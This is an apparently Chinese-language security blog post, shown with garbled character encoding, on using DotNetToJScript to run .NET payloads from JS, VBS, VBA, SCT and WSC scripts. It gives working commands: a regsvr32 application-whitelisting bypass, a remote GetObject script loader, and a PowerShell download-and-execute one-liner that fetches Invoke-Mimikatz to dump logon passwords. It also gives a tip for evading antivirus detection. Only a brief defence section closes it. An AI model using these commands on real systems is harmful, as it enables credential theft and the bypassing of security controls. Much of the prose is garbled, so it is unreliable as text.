I"¢%<h2 id="0x00-å‰è¨€">0x00 å‰è¨€</h2>
<hr />

<p>æœ€è¿‘James Forshawå¼€æºäº†ä¸€ä¸ªå·¥å…·<code class="language-plaintext highlighter-rouge">DotNetToJScript</code>ï¼Œèƒ½å¤Ÿåˆ©ç”¨JS/Vbsè„šæœ¬åŠ è½½.Netç¨‹åºï¼Œå¾ˆæœ‰è¶£ã€‚
Casey Smithå’ŒCn33lizéƒ½å¯¹æ­¤åšäº†è¿›ä¸€æ­¥ç ”ç©¶ï¼Œå¼€æºäº†ä»–ä»¬çš„åˆ©ç”¨ä»£ç ã€‚
æœ¬æ–‡å°†è¦å¯¹è¯¥æŠ€æœ¯ä½œç³»ç»Ÿæ•´ç†ï¼Œå¸®åŠ©å¤§å®¶æ›´å¥½çš„è®¤è¯†ã€‚</p>

<h2 id="0x01-ç®€ä»‹">0x01 ç®€ä»‹</h2>
<hr />

<p>æœ¬æ–‡å°†è¦ä»‹ç»ä»¥ä¸‹å†…å®¹ï¼š</p>

<ul>
  <li>DotNetToJScriptç¼–è¯‘æ–¹æ³•</li>
  <li>DotNetToJScriptä½¿ç”¨æ–¹æ³•</li>
  <li>åˆ©ç”¨JS/Vbsæ‰§è¡Œshellcode</li>
  <li>åˆ©ç”¨JS/Vbsæ‰§è¡Œpowershellè„šæœ¬</li>
</ul>

<h2 id="0x02-dotnettojscriptç¼–è¯‘æ–¹æ³•">0x02 DotNetToJScriptç¼–è¯‘æ–¹æ³•</h2>
<hr />

<p><strong>DotNetToJScriptä¸‹è½½åœ°å€ï¼š</strong></p>

<p>https://github.com/tyranid/DotNetToJScript</p>

<p>ä½¿ç”¨å·¥å…·VS2012è¿›è¡Œç¼–è¯‘</p>

<h3 id="æŠ¥é”™1">æŠ¥é”™1ï¼š</h3>

<p>ç¼ºå°‘ç¨‹åºé›†å¼•ç”¨NDesk.Options</p>

<p><strong>è§£å†³æ–¹æ³•ï¼š</strong></p>

<p>éœ€è¦æ·»åŠ å¼•ç”¨<code class="language-plaintext highlighter-rouge">NDesk.Options</code></p>

<p><strong>ä¸‹è½½åœ°å€ï¼š</strong></p>

<p>http://www.ndesk.org/Options</p>

<p>è§£å‹ç¼©ï¼Œå·¥ç¨‹-æ·»åŠ å¼•ç”¨-æµè§ˆ-\ndesk-options-0.2.1.bin\ndesk-options-0.2.1.bin\lib\ndesk-options\NDesk.Options.dll</p>

<p>æ¥ä¸‹æ¥ï¼Œå°†ç›®æ ‡æ¡†æ¶æŒ‡å®šä¸º.NET Frameword 2.0ï¼Œé‡æ–°ç¼–è¯‘</p>

<h3 id="æŠ¥é”™2">æŠ¥é”™2ï¼š</h3>

<p>ç¼ºå°‘ç¨‹åºé›†å¼•ç”¨Linq</p>

<p><strong>è§£å†³æ–¹æ³•ï¼š</strong></p>

<p>æ·»åŠ å¯¹System.Core.dll 3.5çš„å¼•ç”¨</p>

<p>ä½ç½®:</p>

<p><code class="language-plaintext highlighter-rouge">C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\System.Core.dll</code></p>

<p>æ·»åŠ å¼•ç”¨åç¼–è¯‘æˆåŠŸï¼Œåˆ†åˆ«åœ¨ä¸¤ä¸ªç›®å½•ç”ŸæˆDotNetToJScript.exeå’ŒExampleAssembly.dll</p>

<h2 id="0x03-dotnettojscriptä½¿ç”¨æ–¹æ³•">0x03 DotNetToJScriptä½¿ç”¨æ–¹æ³•</h2>
<hr />

<h3 id="1ç”Ÿæˆjsè„šæœ¬">1ã€ç”Ÿæˆjsè„šæœ¬</h3>

<p>å‚æ•°å¦‚ä¸‹ï¼š</p>

<p><code class="language-plaintext highlighter-rouge">DotNetToJScript.exe -o 1.js ExampleAssembly.dll</code></p>

<p>æ‰§è¡Œåï¼Œç”Ÿæˆ1.js</p>

<p>æ‰§è¡Œ1.jsï¼Œè°ƒç”¨ExampleAssembly.dllä¸­çš„public TestClass()</p>

<p>å¦‚ä¸‹å›¾</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2017-6-30/3-1.png" alt="Alt text" /></p>

<p>æ‰§è¡Œè¿‡ç¨‹å¦‚ä¸‹å›¾ï¼Œå¼¹å‡ºå¯¹è¯æ¡†</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2017-6-30/3-2.png" alt="Alt text" /></p>

<h3 id="2ç”Ÿæˆvbsè„šæœ¬">2ã€ç”Ÿæˆvbsè„šæœ¬</h3>

<p>å‚æ•°å¦‚ä¸‹ï¼š</p>

<p><code class="language-plaintext highlighter-rouge">DotNetToJScript.exe -l vbscript -o 2.vbs ExampleAssembly.dll</code></p>

<p>æ‰§è¡Œå¦‚ä¸‹å›¾</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2017-6-30/3-3.png" alt="Alt text" /></p>

<h3 id="3ç”Ÿæˆvbaè„šæœ¬">3ã€ç”Ÿæˆvbaè„šæœ¬</h3>

<p>å‚æ•°å¦‚ä¸‹ï¼š</p>

<p><code class="language-plaintext highlighter-rouge">DotNetToJScript.exe -l vba -o 2.txt ExampleAssembly.dll</code></p>

<p>ç”¨æ¥æ”¾åœ¨officeå®ä¸­</p>

<h3 id="4ç”Ÿæˆsctè„šæœ¬">4ã€ç”Ÿæˆsctè„šæœ¬</h3>

<p>å‚æ•°å¦‚ä¸‹ï¼š</p>

<p><code class="language-plaintext highlighter-rouge">DotNetToJScript.exe -u -o 3.sct ExampleAssembly.dll</code></p>

<p>å¯åŠ¨æ–¹å¼:</p>

<p>å‘½ä»¤è¡Œå‚æ•°å¦‚ä¸‹ï¼š</p>

<p><code class="language-plaintext highlighter-rouge">regsvr32.exe /u /n /s /i:3.sct scrobj.dll</code></p>

<p><strong>æ³¨ï¼š</strong></p>

<p>ç»†èŠ‚å¯å‚è€ƒä¹‹å‰çš„æ–‡ç« ã€ŠUse SCT to Bypass Application Whitelisting Protectionã€‹</p>

<h3 id="5ç”Ÿæˆwscè„šæœ¬">5ã€ç”Ÿæˆwscè„šæœ¬</h3>

<p>å‚æ•°å¦‚ä¸‹ï¼š</p>

<p><code class="language-plaintext highlighter-rouge">DotNetToJScript.exe -m -o 4.wsc ExampleAssembly.dll</code></p>

<p><strong>å¯åŠ¨æ–¹å¼1ï¼šæœ¬åœ°è°ƒç”¨</strong></p>

<p>é€šè¿‡jsè°ƒç”¨ï¼Œjsè„šæœ¬å†…å®¹å¦‚ä¸‹ï¼š</p>

<p><code class="language-plaintext highlighter-rouge">GetObject("script:C:\\test\\4.wsc");</code></p>

<p><strong>æ³¨ï¼š</strong></p>

<p>éœ€è¦ç»å¯¹è·¯å¾„ï¼Œwscæ–‡ä»¶åç¼€åä»»æ„</p>

<p><strong>å¯åŠ¨æ–¹å¼2ï¼šè¿œç¨‹å¯åŠ¨</strong></p>

<p>å°†4.wscä¿å­˜åœ¨githubï¼Œåœ°å€å¦‚ä¸‹ï¼š</p>

<p>https://raw.githubusercontent.com/3gstudent/test/master/4.wsc</p>

<p>jsè„šæœ¬å†…å®¹å¦‚ä¸‹ï¼š</p>

<p><code class="language-plaintext highlighter-rouge">GetObject("script:https://raw.githubusercontent.com/3gstudent/test/master/4.wsc")</code></p>

<p><strong>æ³¨ï¼š</strong></p>

<p>ç»†èŠ‚å¯å‚è€ƒä¹‹å‰çš„æ–‡ç« ã€ŠWSCã€JSRAT and WMI Backdoorã€‹</p>

<h2 id="0x04-åˆ©ç”¨jsvbsèƒ½å¤Ÿå®ç°çš„payloadæ±‡æ€»">0x04 åˆ©ç”¨JS/Vbsèƒ½å¤Ÿå®ç°çš„payloadæ±‡æ€»</h2>
<hr />

<p>å¯¹ä»¥ä¸Šæµ‹è¯•ä¸­çš„ExampleAssembly.dllï¼Œå¯æ›¿æ¢æˆå…¶ä»–payloadï¼š</p>

<h3 id="1æ‰§è¡Œshellcode">1ã€æ‰§è¡Œshellcode</h3>

<p>ä»£ç å¯å‚è€ƒå¦‚ä¸‹åœ°å€ï¼š</p>

<p>https://gist.github.com/subTee/618d40aa4229581925eb9025429d8420#gistcomment-2057305</p>

<p>æ–°å»ºc#å·¥ç¨‹ï¼Œå¯é€‰æ‹©c#æ§åˆ¶å°åº”ç”¨ç¨‹åºï¼Œç¼–è¯‘æˆexe</p>

<p>ç”Ÿæˆjsè„šæœ¬çš„å‚æ•°å¦‚ä¸‹ï¼š</p>

<p><code class="language-plaintext highlighter-rouge">DotNetToJScript.exe -o shellcode.js shellcode.exe</code></p>

<p>æµ‹è¯•å¦‚ä¸‹å›¾</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2017-6-30/3-4.png" alt="Alt text" /></p>

<h3 id="2æ‰§è¡Œmimikatz">2ã€æ‰§è¡Œmimikatz</h3>

<p>ä»£ç å¯å‚è€ƒå¦‚ä¸‹åœ°å€ï¼š</p>

<p>https://gist.github.com/subTee/b30e0bcc7645c790fcd993cfd0ad622f</p>

<p>åœ¨c#ä¸­æ‰§è¡Œmimikatzçš„ä»£ç å¯å‚è€ƒå¦‚ä¸‹åœ°å€ï¼š</p>

<p>https://gist.github.com/subTee/5c636b8736530fb20c3d</p>

<h3 id="3æ‰§è¡Œpowershell">3ã€æ‰§è¡Œpowershell</h3>

<p>ä»£ç å¯å‚è€ƒå¦‚ä¸‹åœ°å€ï¼š</p>

<p>https://github.com/Cn33liz/StarFighters</p>

<p>ä½œè€…ï¼šCn33liz</p>

<p><strong>StarFightersï¼š</strong></p>

<ul>
  <li>èƒ½å¤ŸåŠ è½½Empireæ¡†æ¶çš„å¯åŠ¨ä»£ç </li>
  <li>æ”¯æŒJavaScriptå’ŒVBScript</li>
  <li>ä¸éœ€è¦powershell.exeï¼Œå¯ç”¨äºç»•è¿‡ç™½åå•æ‹¦æˆª</li>
  <li>é€šè¿‡powershell runspace environment (.NET)æ‰§è¡Œpowershellä»£ç </li>
</ul>

<p>æ‰§è¡Œpowershellä»£ç çš„æ–¹å¼å¯å‚è€ƒå·¥ç¨‹p0wnedShellï¼Œåœ°å€å¦‚ä¸‹ï¼š</p>

<p>https://github.com/Cn33liz/p0wnedShell</p>

<p>æˆ‘ä¹‹å‰å¯¹æ­¤åšè¿‡ç ”ç©¶ï¼Œå¯¹å…¶ç²¾ç®€ä»£ç ï¼Œä½¿å…¶æ”¯æŒ.net 2.0ï¼Œåœ°å€å¦‚ä¸‹ï¼š</p>

<p>https://github.com/3gstudent/Smallp0wnedShell</p>

<p><strong>å®é™…æµ‹è¯•ï¼š</strong></p>

<p>StarFightersä¸ä»…èƒ½å¤ŸåŠ è½½Empireæ¡†æ¶çš„å¯åŠ¨ä»£ç ï¼Œä¹Ÿå¯ç”¨æ¥ç›´æ¥æ‰§è¡Œpowershellå‘½ä»¤</p>

<p><strong>æ–¹å¼å¦‚ä¸‹ï¼š</strong></p>

<p><strong>ï¼ˆ1ï¼‰æ‰§è¡Œpowershellå•æ¡å‘½ä»¤</strong></p>

<p>éœ€è¦å¯¹å‘½ä»¤ä½œbase64ç¼–ç ï¼Œå‘½ä»¤å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$code = 'start calc.exe'
$bytes  = [System.Text.Encoding]::UNICODE.GetBytes($code);
$encoded = [System.Convert]::ToBase64String($bytes)
$encoded 
</code></pre></div></div>

<p>å¾—åˆ°base64ä»£ç å¦‚ä¸‹ï¼š</p>

<p><code class="language-plaintext highlighter-rouge">cwB0AGEAcgB0ACAAYwBhAGwAYwAuAGUAeABlAA==</code></p>

<p>æ›¿æ¢StarFighter.jsä¸­çš„var EncodedPayload</p>

<p>æˆåŠŸæ‰§è¡Œï¼Œå¼¹å‡ºè®¡ç®—å™¨å¦‚ä¸‹å›¾</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2017-6-30/4-1.png" alt="Alt text" /></p>

<p><strong>ï¼ˆ2ï¼‰æœ¬åœ°æ‰§è¡Œpowershellè„šæœ¬</strong></p>

<p>ä½¿ç”¨Invoke-Mimikatz.ps1ï¼Œä¸‹è½½åœ°å€å¦‚ä¸‹ï¼š</p>

<p>https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1</p>

<p>æ·»åŠ å¯¼å£ä»¤çš„æ“ä½œä»£ç ï¼š</p>

<p><code class="language-plaintext highlighter-rouge">Invoke-Mimikatz -Command "log privilege::debug sekurlsa::logonpasswords"</code></p>

<p><strong>æ³¨ï¼š</strong></p>

<p>æ·»åŠ logå‚æ•°æ˜¯ä¸ºäº†å°†ç»“æœå¯¼å‡ºåˆ°æ–‡ä»¶mimikatz.log</p>

<p>å‘½ä»¤å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$code = Get-Content -Path Invoke-Mimikatz.ps1
$bytes  = [System.Text.Encoding]::UNICODE.GetBytes($code);
$encoded = [System.Convert]::ToBase64String($bytes)
$encoded | Out-File 1.txt
</code></pre></div></div>

<p>å°†ç”Ÿæˆçš„1.txtä¸­çš„å†…å®¹æ›¿æ¢StarFighter.jsä¸­çš„var EncodedPayload</p>

<p><strong>ï¼ˆ3ï¼‰è¿œç¨‹æ‰§è¡Œpowershellè„šæœ¬</strong></p>

<p>powershellå‘½ä»¤å¦‚ä¸‹ï¼š</p>

<p><code class="language-plaintext highlighter-rouge">powershell IEX "(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -Command 'log privilege::debug sekurlsa::logonpasswords'"</code></p>

<p>ä½œbase64çš„ä»£ç å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$code = Get-Content -Path code.txt
$bytes  = [System.Text.Encoding]::UNICODE.GetBytes($code);
$encoded = [System.Convert]::ToBase64String($bytes)
$encoded | Out-File 2.txt
</code></pre></div></div>

<p>å°†ç”Ÿæˆçš„2.txtä¸­çš„å†…å®¹æ›¿æ¢StarFighter.jsä¸­çš„var EncodedPayload</p>

<p><strong>æ³¨ï¼š</strong></p>

<p>æŸæ€æ¯’è½¯ä»¶é»˜è®¤ä¼šæŸ¥æ€è¯¥jsè„šæœ¬ï¼Œä¸€ä¸ªç»•è¿‡é™æ€æŸ¥æ€çš„æ€è·¯ï¼ˆä¸ä¿è¯æœ‰æ•ˆæœŸï¼‰ï¼š</p>

<ul>
  <li>å°†è„šæœ¬ä¿å­˜æˆASCIIæ ¼å¼ï¼Œä¼šè¢«æŸ¥æ€</li>
  <li>æ¢æˆUNICODEæ ¼å¼ï¼Œä¸è¢«æŸ¥æ€</li>
</ul>

<h2 id="0x05-é˜²å¾¡">0x05 é˜²å¾¡</h2>
<hr />

<p>ç«™åœ¨é˜²å¾¡çš„è§’åº¦ï¼Œå¤§å®¶éƒ½ä¼šå¯¹powerShell.exeä½œæ‹¦æˆªï¼Œä½†æ˜¯è¿™è¿˜è¿œè¿œä¸å¤Ÿ:</p>

<p><strong>powershell runspace environment (.NET)æ‰æ˜¯é‡ç‚¹</strong></p>

<p>å…·ä½“åˆ°æœ¬æ–‡çš„æŠ€å·§ï¼Œé˜²å¾¡æ–¹æ³•å¦‚ä¸‹ï¼š</p>

<p>åˆ†åˆ«å¯¹jsã€vbsã€vbaå®ã€sctã€wscè„šæœ¬ä½œé™åˆ¶</p>

<hr />

<p><a href="https://github.com/3gstudent/feedback/issues/new">LEAVE A REPLY</a></p>
:ET